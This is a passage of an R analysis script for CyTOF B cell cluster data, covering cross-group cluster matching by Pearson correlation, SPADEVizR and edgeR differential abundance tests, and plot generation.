#obtain the cluster name
clusters = unique(raw_table$Cluster)
#obtain the amount of clusters
nCluster = length(clusters)
#create a blank table with labels
mean_marker_total_cells = data.frame(tmp_name = 0)
for(i in 1:(ncol(raw_table)-1)){
mean_marker_total_cells = cbind(mean_marker_total_cells, 0)
}
colnames(mean_marker_total_cells) = colnames(raw_table)
mean_marker_total_cells = mean_marker_total_cells[, colnames(mean_marker_total_cells)!= "Term"]
# creat a array for storing the number of total numbers of cluster for samples
cluster_count = rep(0,nCluster)
#calculate and store the total numbers of cluster for samples
j = 1
k = 1
for(i in 1:nrow(raw_table)){
if(i == nrow(raw_table)){
cluster_count[j] = cluster_count[j] + 1
for(n in 1:ncol(mean_marker_total_cells)){
if(n == 1){
mean_marker_total_cells[k,n] = raw_table$Cluster[i]
}
if(n == 2){
mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
}
if(n > 2){
mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
}
}
break()
}
if(raw_table$Cluster[i] == raw_table$Cluster[i+1]){
cluster_count[j] = cluster_count[j] + 1
}else{
cluster_count[j] = cluster_count[j] + 1
for(n in 1:ncol(mean_marker_total_cells)){
if(n == 1){
mean_marker_total_cells[k,n] = raw_table$Cluster[i]
}
if(n == 2){
mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
}
if(n > 2){
mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
}
}
mean_marker_total_cells = rbind(mean_marker_total_cells, 0)
j = j + 1
k = k + 1
}
}
tmp_rescale <- function(x) (x-min(x))/(max(x) - min(x))
tmp_mean_marker_total_cells = mean_marker_total_cells
tmp_mean_marker_total_cells$Cluster = paste(experiment_name,
"_",
tmp_mean_marker_total_cells$Cluster,
sep = "")
rownames(tmp_mean_marker_total_cells) = tmp_mean_marker_total_cells[,1]
tmp_mean_marker_total_cells = tmp_mean_marker_total_cells[,-1]
tmp_mean_marker_total_cells$Count1 = tmp_mean_marker_total_cells$Count
if(rescale==TRUE){
for(i in 1:(ncol(tmp_mean_marker_total_cells)-1)){
tmp_mean_marker_total_cells[,i] = tmp_rescale(tmp_mean_marker_total_cells[,i])
}
}
return(tmp_mean_marker_total_cells)
}
### Change experiment_file names to match reformatted excel sheets used for SpadevizR
## All files must be in correct folder in the working path in order to run code!
experiment1 = rescale_to_0_1(experiment_name = "Grp1",
experiment_file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt",
rescale = TRUE)
#includes count - can # if dont want to rank based on count
#experiment1 = experiment1[, colnames(experiment1) != "Count"]
experiment2 = rescale_to_0_1(experiment_name = "Grp2",
experiment_file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt",
rescale = TRUE)
#includes count - can # if dont want to rank based on count
#experiment2 = experiment2[, colnames(experiment2) != "Count"]
experiment1_1 = experiment1
experiment1 = experiment1[, colnames(experiment1) != "Count1"]
experiment2_1 = experiment2
experiment2 = experiment2[, colnames(experiment2) != "Count1"]
#create a blank table to store the pearson correlation results
experiment1_experiment2_Pearson_correlation<-data.frame(experiment1_cluster = 0, experiment2_cluster = 0, experiment1_count = 0, experiment2_count = 0)
#perform pairwise pearson correlation between experiment1 and experiment2
t=1
for(i in 1:nrow(experiment1)){
for(j in 1:nrow(experiment2)){
experiment1_experiment2_Pearson_correlation$experiment1_cluster[t]<-rownames(experiment1)[i]
experiment1_experiment2_Pearson_correlation$experiment2_cluster[t]<-rownames(experiment2)[j]
pearson_statictis<-cor.test(as.numeric(experiment1[i,]),as.numeric(experiment2[j,]),method = "pearson")
experiment1_experiment2_Pearson_correlation$cor[t]<-pearson_statictis$estimate
experiment1_experiment2_Pearson_correlation$p.value[t]<-pearson_statictis$p.value
experiment1_experiment2_Pearson_correlation$experiment1_count[t]<-experiment1_1$Count1[i]
experiment1_experiment2_Pearson_correlation$experiment2_count[t]<-experiment2_1$Count1[j]
t<-t+1
experiment1_experiment2_Pearson_correlation<-rbind(experiment1_experiment2_Pearson_correlation, 0)
}
}
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[, c(1,2,5,6,3,4)]
#Sorting the data for better view
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[
order(experiment1_experiment2_Pearson_correlation$cor, decreasing = TRUE),]
#Take a look at the results
View(experiment1_experiment2_Pearson_correlation)
# create a CSV file storing the pearson correlation data
write.csv(experiment1_experiment2_Pearson_correlation, "DR3 D51 B Cells Pearsons Coefficient.csv", row.names = FALSE)
####################################################################################################################################################################################
####################################################################################################################################################################################
setwd(PrimaryDirectory)
##################################################
## Matching Script - combines cluster data from group 1 and 2 and reformats to create grouped_file containing all cluster information for newly named matched clusters (n=4 -> n=8)
##################################################
# read data
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster = paste("Grp1_Cluster_", Grp1_data$Cluster, sep ="")
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster = paste("Grp2_Cluster_", Grp2_data$Cluster, sep ="")
### CHANGE Number in the parentheses to match the number of markers used (ie, 40 in Live cells -> 35 in innate cells)
for(i in 4:37){
#i = 4
Grp1_min = min(Grp1_data[,i])
Grp2_min = min(Grp2_data[,i])
if(Grp1_min > Grp2_min){
correlation = Grp1_min - Grp2_min
Grp1_data[,i] = Grp1_data[,i] - correlation
}
if(Grp2_min > Grp1_min){
correlation = Grp2_min - Grp1_min
Grp2_data[,i] = Grp2_data[,i] - correlation
}
}
grouped_file = rbind(Grp1_data, Grp2_data)
### MAKE SURE THE COLUMN V ("CXCR4" has the X in it. Often group 2 sheet will read "CCR4")
# Change matching_file_name to name of .txt file that contains Group 1 Clusters and their new_name in addition to matching Group 2 Clusters and their new_name
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#match the new name
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
#resort the data
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
#Replace NA in new_cluster_name with original cluster number
for (i in 1: nrow(grouped_file)){
if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 20)
}
}
# #delete the unmatched clusters
# grouped_file = grouped_file[!is.na(grouped_file$new_cluster_name), ]
#sorting the data for better view
grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
grouped_file = cbind(grouped_file, 0)
### CHANGE NUMBER IN BRACKETS BELOW TO MATCH NUMBER OF MARKERS + 2
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", row.names=FALSE)
##############################################
# Generates an "Abundance" sheet to use for analysis using the frequency of the cluster in the mouse
##############################################
#-------recale function-------#
tmp_percent <- function(x) (x/sum(x))*100
#-------recale function-------#
# Change grouped_file_name to name of .txt file that contains ALL DATA from Group 1 and 2
Grp1_file = "Data for Scatter Plot Group 1.txt"
Grp2_file = "Data for Scatter Plot Group 2.txt"
Grp1_data = read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data <- as.data.frame(Grp1_data[1:185,1:17])
Grp1_data$Cluster = paste("Grp1_", Grp1_data$Cluster, sep ="")
Grp1_data$Cluster = gsub(" ", "_", Grp1_data$Cluster)
#rescale the markers expression
for(i in 2:ncol(Grp1_data)){
Grp1_data[,i] = tmp_percent(Grp1_data[,i])
}
Grp2_data = read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data <- as.data.frame(Grp2_data[1:151,1:16])
Grp2_data$Cluster = paste("Grp2_", Grp2_data$Cluster, sep ="")
Grp2_data$Cluster = gsub(" ", "_", Grp2_data$Cluster)
#rescale the markers expression
for(i in 2:ncol(Grp2_data)){
Grp2_data[,i] = tmp_percent(Grp2_data[,i])
}
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#create a blank table to store data
grouped_data = data.frame(tmp_name = 0)
tmp_data = matching_file[matching_file$new_name == 1,]
Grp1_tmp_data = Grp1_data[Grp1_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp1_tmp_data) = Grp1_tmp_data$Cluster
Grp1_tmp_data$Cluster = NULL
Grp2_tmp_data = Grp2_data[Grp2_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp2_tmp_data) = Grp2_tmp_data$Cluster
Grp2_tmp_data$Cluster = NULL
tmp_combined_data_1 = cbind(Grp1_tmp_data, Grp2_tmp_data)
#tmp_combined_data_1 = rbind(Grp1_tmp_data, Grp2_tmp_data)
#rownames(tmp_combined_data_1) = paste("Cluster_", 1, sep = "")
grouped_data = tmp_combined_data_1
for (i in unique(matching_file$new_name)){
#i=1
tmp_data = matching_file[matching_file$new_name == i,]
Grp1_tmp_data = Grp1_data[Grp1_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp1_tmp_data) = Grp1_tmp_data$Cluster
Grp1_tmp_data$Cluster = NULL
Grp2_tmp_data = Grp2_data[Grp2_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp2_tmp_data) = Grp2_tmp_data$Cluster
Grp2_tmp_data$Cluster = NULL
tmp_combined_data = cbind(Grp1_tmp_data, Grp2_tmp_data)
rownames(tmp_combined_data) = paste("Cluster_", i, sep = "")
grouped_data = rbind(grouped_data, tmp_combined_data)
}
grouped_data = grouped_data[-1, ]
#grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
write.xlsx(grouped_data, "Abundance DR3 Day 51 B Cell Data.xlsx", row.names=TRUE)
#####################################################################################################
#MODIFIED PCP GENERATOR FOR PHENOTYPE
#####################################################################################################
setwd(PrimaryDirectory)
### Import "Phenotype", from desired excel file - must change path and excel file name for particular function
##### MAKE SURE YOU HAVE SAVED YOUR GENERATED PHENOTYPE SHEET AS AN .XLSX File
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", sheet = "Sheet 1")
View(Phenotype)
#Must change parameters of phenotype sheet according to file size
cluster.phenotypes <- as.data.frame(Phenotype[1:5225,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
phenoViewer_modified_v2 <-function( cluster.phenotypes,
samples = NULL,
clusters,
markers = NULL,
show.mean = "only",
show.on_device = TRUE,
sort.markers = TRUE){
if (is.null(samples)) {
samples <- unique(cluster.phenotypes$Term)
data <- cluster.phenotypes
} else if (!all(samples %in% Results@sample.names)) {
stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
} else {
data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
}
data <- stats::na.omit(data)
clusters <- unique(clusters)
clusters.select <- data[, "Cluster"] %in% clusters
data <- data[clusters.select,]
data <- plyr::ddply(data, c("Term"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
data <- reshape2::melt(data, id = c("Term"), stringsAsFactors = FALSE)
colnames(data) <- c("samples", "marker", "value")
title <- paste("Cluster_", clusters, sep = "")
max.value <- -1
min.value <- -1
max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
max.value <- max.value * (1 + sign(max.value) * 0.1)
min.value <- min.value * (1 - sign(min.value) * 0.1)
means <- plyr::ddply(data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(means) <- c("marker", "means")
data_means <- data.frame(marker = 0, means= 0, clusters = 0)
tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
for(i in tmp_clusters){
tmp_data<- cluster.phenotypes
tmp_clusters.select <- tmp_data[, "Cluster"] %in% i
tmp_data <- tmp_data[tmp_clusters.select,]
tmp_data <- plyr::ddply(tmp_data, c("Term"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
tmp_data <- reshape2::melt(tmp_data, id = c("Term"), stringsAsFactors = FALSE)
colnames(tmp_data) <- c("samples", "marker", "value")
tmp_means <- plyr::ddply(tmp_data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(tmp_means) <- c("marker", "means")
tmp_means$clusters = i
data_means = rbind(data_means, tmp_means)
}
data_means = data_means[-1, ]
rescale_data_means = data_means
rescale_means = data_means[data_means$clusters == clusters,]
plot <- ggplot2::ggplot(data = rescale_data_means) +
ggplot2::ggtitle(bquote(atop(.(title))))
plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
size = 0.4,
alpha = 1,
color = "#CCCCCC")+
ggplot2::scale_y_continuous(limits = c(min(data_means$means), max(data_means$means)), breaks = round(seq(0, max(data_means$means), by = 1), 0)) +
ggplot2::theme_bw()
plot <- plot + ggplot2::geom_line(data = rescale_means,
ggplot2::aes_string(x = "marker", y = "means", group = 1),
linetype = "solid",
size = 1,
color = "#FF6666")
plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = "bold")) +
ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
legend.key = ggplot2::element_blank(),
plot.title = ggplot2::element_text(hjust=0.5)) +
ggplot2::xlab("markers") +
ggplot2::ylab("marker expressions") +
ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
grid::grid.draw(plot)
invisible(plot)
}
# Should you only want to see one cluster image
# phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
# clusters = "2887")
dir.create("Grouped_ClusterImages", showWarnings = FALSE)
setwd("Grouped_ClusterImages")
a = cluster.phenotypes[which(cluster.phenotypes$Cluster %in% c(1:31)), ]
for (i in unique(a$Cluster)){
jpeg(paste("Cluster_", i, ".jpeg"),
width=2000,
height=1500,
res = 300)
phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
clusters = i)
dev.off()
}
setwd(PrimaryDirectory)
##################################################
# GENERATES PHENOTYPE SHEET FOR GROUPED CLUSTERS TO BE USED FOR SPADEVIZR ANALYSIS
##################################################
# read data
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster = paste("Grp1_Cluster_", Grp1_data$Cluster, sep ="")
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster = paste("Grp2_Cluster_", Grp2_data$Cluster, sep ="")
### CHANGE to match number of markers
for(i in 4:37){
#i = 4
Grp1_min = min(Grp1_data[,i])
Grp2_min = min(Grp2_data[,i])
if(Grp1_min > Grp2_min){
correlation = Grp1_min - Grp2_min
Grp1_data[,i] = Grp1_data[,i] - correlation
}
if(Grp2_min > Grp1_min){
correlation = Grp2_min - Grp1_min
Grp2_data[,i] = Grp2_data[,i] - correlation
}
}
grouped_file = rbind(Grp1_data, Grp2_data)
# Change matching_file_name to name of .txt file that contains Group 1 Clusters and their new_name in addition to matching Group 2 Clusters and their new_name
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#match the new name
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
#resort the data
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
#Replace NA in new_cluster_name with original cluster number
for (i in 1: nrow(grouped_file)){
if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 9)
}
}
#delete the unmatched clusters
grouped_file = grouped_file[grouped_file$new_cluster_name != "Grp1_Clus", ]
grouped_file = grouped_file[grouped_file$new_cluster_name != "Grp2_Clus", ]
grouped_file = cbind(grouped_file, 0)
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
#sorting the data for better view
#grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", row.names=FALSE)
# FILE GENERATED ABOVE SERVES AS PHENOTYPE SHEET FOR SPADEVIZR ANALYSIS
##################################################
# SPADEVIZR ANALYSIS - FOR COMBINED GROUP DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype SpadeVizR" respectively, from desired excel file - must change path and excel file name for particular function
Abundance <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
View(Abundance)
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", sheet = "Sheet 1")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 334 and 338 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:31,1:32])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:961,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
cluster.phenotypes$Cluster = paste("Cluster_", cluster.phenotypes$Cluster, sep ="")
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### Edit file names for each group based on experiment layout (can copy and paste group names from console window below to assure names are correct)
Control <- c("c05_Grp1_DR3_D51_B.Cells._37p", "c05_GRP2_DR3_Day51_B.Cells._37p", "c06_Grp1_DR3_D51_B.Cells._37p", "c06_GRP2_DR3_Day51_B.Cells._37p", "c07_Grp1_DR3_D51_B.Cells._37p", "c07_GRP2_DR3_Day51_B.Cells._37p", "c08_Grp1_DR3_D51_B.Cells._37p", "c08_GRP2_DR3_Day51_B.Cells._37p")
Naive_Chal <- c("c01_Grp1_DR3_D51_B.Cells._37p", "c02_Grp1_DR3_D51_B.Cells._37p", "c02_GRP2_DR3_Day51_B.Cells._37p", "c03_Grp1_DR3_D51_B.Cells._37p", "c03_GRP2_DR3_Day51_B.Cells._37p", "c04_Grp1_DR3_D51_B.Cells._37p", "c04_GRP2_DR3_Day51_B.Cells._37p")
Vax_Chal <- c("c09_Grp1_DR3_D51_B.Cells._37p", "c09_GRP2_DR3_Day51_B.Cells._37p", "c10_Grp1_DR3_D51_B.Cells._37p", "c10_GRP2_DR3_Day51_B.Cells._37p", "c11_Grp1_DR3_D51_B.Cells._37p", "c11_GRP2_DR3_Day51_B.Cells._37p", "c12_Grp1_DR3_D51_B.Cells._37p", "c12_GRP2_DR3_Day51_B.Cells._37p")
Vax_Unchal <- c("c13_Grp1_DR3_D51_B.Cells._37p", "c13_GRP2_DR3_Day51_B.Cells._37p", "c14_Grp1_DR3_D51_B.Cells._37p", "c14_GRP2_DR3_Day51_B.Cells._37p", "c15_Grp1_DR3_D51_B.Cells._37p", "c15_GRP2_DR3_Day51_B.Cells._37p", "c16_Grp1_DR3_D51_B.Cells._37p", "c16_GRP2_DR3_Day51_B.Cells._37p")
### Generates Volcano plots for all conditions selected
## If want to change p-value to 0.01, change "th.pvalue = 0.01"
# To run an unpaired T-test, method.paired = FALSE. To run a paired T-test use, method.paired = TRUE
### Generates CSV files for all p values for all clusters and saves them in a folder in your working directory
dir.create("SpadevizR Analysis and Volcano Plots", showWarnings = FALSE)
setwd("SpadevizR Analysis and Volcano Plots")
resultsDAC_CvNC <- identifyDAC(results, condition1 = Control, condition2 = Naive_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_CvNC@results
#View(resultsDAC_CvNC@results)
write.csv(resultsDAC_CvNC@results, "Control_v_Naive_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Control vs Naive_chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_CvNC)
dev.off()
resultsDAC_CvVU <- identifyDAC(results, condition1 = Control, condition2 = Vax_Unchal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_CvVU@results
#View(resultsDAC_CvVU@results)
write.csv(resultsDAC_CvVU@results, "Control_v_Vax_Unchal_DAC_p_values.csv", row.names = FALSE)
tiff("Control vs Vax_Unchal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_CvVU)
dev.off()
resultsDAC_NCvVC <- identifyDAC(results, condition1 = Naive_Chal, condition2 = Vax_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_NCvVC@results
#View(resultsDAC_NCvVC@results)
write.csv(resultsDAC_NCvVC@results, "Naive_Chal_v_Vax_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Naive_Chal vs Vax_Chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_NCvVC)
dev.off()
resultsDAC_VUvVC <- identifyDAC(results, condition1 = Vax_Unchal, condition2 = Vax_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_VUvVC@results
#View(resultsDAC_VUvVC@results)
write.csv(resultsDAC_VUvVC@results, "Vax_Unchal_v_Vax_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Vax_Unchal vs Vax_Chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_VUvVC)
dev.off()
resultsDAC_CvVC <- identifyDAC(results, condition1 = Control, condition2 = Vax_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_CvVC@results
#View(resultsDAC_CvVC@results)
write.csv(resultsDAC_CvVC@results, "Control_v_Vax_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Control vs Vax_Chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_CvVC)
dev.off()
resultsDAC_NCvVU <- identifyDAC(results, condition1 = Naive_Chal, condition2 = Vax_Unchal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_NCvVU@results
#View(resultsDAC_NCvVU@results)
write.csv(resultsDAC_NCvVU@results, "Naive_Chal_v_Vax_Unchal_DAC_p_values.csv", row.names = FALSE)
tiff("Naive_Chal vs Vax_Unchal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_NCvVU)
dev.off()
setwd(PrimaryDirectory)
###################################################
# Analysis with edgeR
###################################################
edgeR_analysis <- function(data_experiment, data_control, experiment_sample_size, control_sample_size, export_file_name){
#
# data_experiment = Vax_Chal.abundances
# data_control = Naive_Chal.abundances
# experiment_sample_size = 8
# control_sample_size = 7
# export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis"
tmp_cluster.abundances = cbind(data_experiment, data_control)
# Group assignment
conditions1 = rep("A", experiment_sample_size)
conditions2 = rep("B", control_sample_size)
conditions = c(conditions1, conditions2)
y <- DGEList(tmp_cluster.abundances)
## ------------------------------------------------------------------------
#Because data has been rescaled, cant use this function which removes any clusters with less than 5 cells
#keep <- aveLogCPM(y) >= aveLogCPM(5, mean(y$samples$lib.size))
#y <- y[keep,]
y = y
## ------------------------------------------------------------------------
design <- model.matrix(~factor(conditions))
y <- estimateDisp(y, design)
fit <- glmQLFit(y, design, robust=TRUE)
res <- glmQLFTest(fit, coef=2)
DAC = topTags(res, n=200, adjust.method="BH", sort.by="PValue", p.value=1)
print(DAC)
View(DAC)
write.csv(DAC, paste(export_file_name, ".csv", sep = ""),row.names = TRUE)
}
Vax_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Chal]
Naive_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Naive_Chal]
Control.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Control]
Vax_Unchal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Unchal]
dir.create("EdgeR Analysis", showWarnings = FALSE)
setwd("EdgeR Analysis")
### Change data_experiment and data_control to sample names you want to compare as well as
### experiment_sample_size and control_sample_size to number of conditions in each sample
### finally, change export_file_name to depict groups being compared
edgeR_analysis(data_experiment = Vax_Chal.abundances,
data_control = Naive_Chal.abundances,
experiment_sample_size = 8,
control_sample_size = 7,
export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Vax_Chal.abundances,
data_control = Vax_Unchal.abundances,
experiment_sample_size = 8,
control_sample_size = 8,
export_file_name = "Vax_Chal v Vax_Unchal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
data_control = Naive_Chal.abundances,
experiment_sample_size = 8,
control_sample_size = 7,
export_file_name = "Control v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
data_control = Vax_Unchal.abundances,
experiment_sample_size = 8,
control_sample_size = 8,
export_file_name = "Control v Vax_Unchal EdgeR Analysis")
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
Grouped_SheetFour <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
write.table(Grouped_SheetFour, file = "Data for Scatter Plot Grouped.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
#data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Grouped_Scatterplots", showWarnings = FALSE)
setwd("Grouped_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
